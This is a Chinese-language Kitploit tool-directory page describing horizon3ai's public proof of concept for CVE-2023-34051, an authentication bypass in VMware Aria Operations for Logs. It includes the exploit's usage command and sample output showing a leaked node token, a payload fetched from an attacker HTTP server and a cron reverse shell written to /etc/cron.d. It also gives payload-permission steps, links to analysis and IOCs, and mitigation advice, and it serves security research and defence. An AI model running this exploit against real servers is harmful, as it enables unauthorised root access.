Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-34051 — VMware Aria Operations for Logs CVE-2023-34051 | Kitploit
工具/GitHubGitHub/horizon3ai/cve-2023-34051
权限提升漏洞分析漏洞利用横向移动Web应用程序漏洞利用后渗透利用渗透测试命令与控制身份验证红队
GitHubhorizon3ai/cve-2023-34051

CVE-2023-34051

6211482年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

VMware Aria Operations for Logs CVE-2023-34051

查看仓库

CVE-2023-34051

CVE-2023-34051 是一个认证绕过漏洞,绕过了 VMSA-2023-0001 的补丁。 VMSA-2023-0001(适用于 vRealize Log Insight)包含以下 CVE:

  • VMware vRealize Log Insight 目录遍历漏洞 (CVE-2022-31706)
  • VMware vRealize Log Insight 访问控制缺陷漏洞 (CVE-2022-31704)
  • VMware vRealize Log Insight 信息泄露漏洞 (CVE-2022-31711)

此漏洞的默认配置会写入一个 cron 任务以创建反向 shell。请务必根据您的环境更改 payload 文件。

技术分析

漏洞的技术根本原因分析可在我们的博客中找到: https://www.horizon3.ai/vmware-aria-operations-for-logs-cve-2023-34051-technical-deep-dive

入侵指标

要分析 Log Insight 实例的入侵指标,请查看我们的 IOC 博客: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/

摘要

此 POC 利用 IP 地址欺骗和各种 Thrift RPC 端点来实现任意文件写入。

用法

root@kitploit:~
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit 
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

故障排除

为使此攻击生效,攻击者必须与主/工作节点具有相同的 IP 地址。更多详情请参阅上文博客。

如果使用基于 cron 的 payload,请确保 payload 文件具有适当的权限和所有者:

root@kitploit:~
sudo chown root:root payload
root@kitploit:~
sudo chmod 0644 payload 

缓解措施

更新到最新版本,或按照 VMSA 中的说明进行缓解 https://www.vmware.com/security/advisories/VMSA-2023-0021.html

关注 Horizon3.ai 攻击团队在 Twitter 上获取最新安全研究:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免责声明

此软件纯粹出于学术研究和开发有效防御技术的目的而创建,不应用于攻击系统,除非明确授权。项目维护者不对软件的滥用负责。请负责任地使用。

下载工具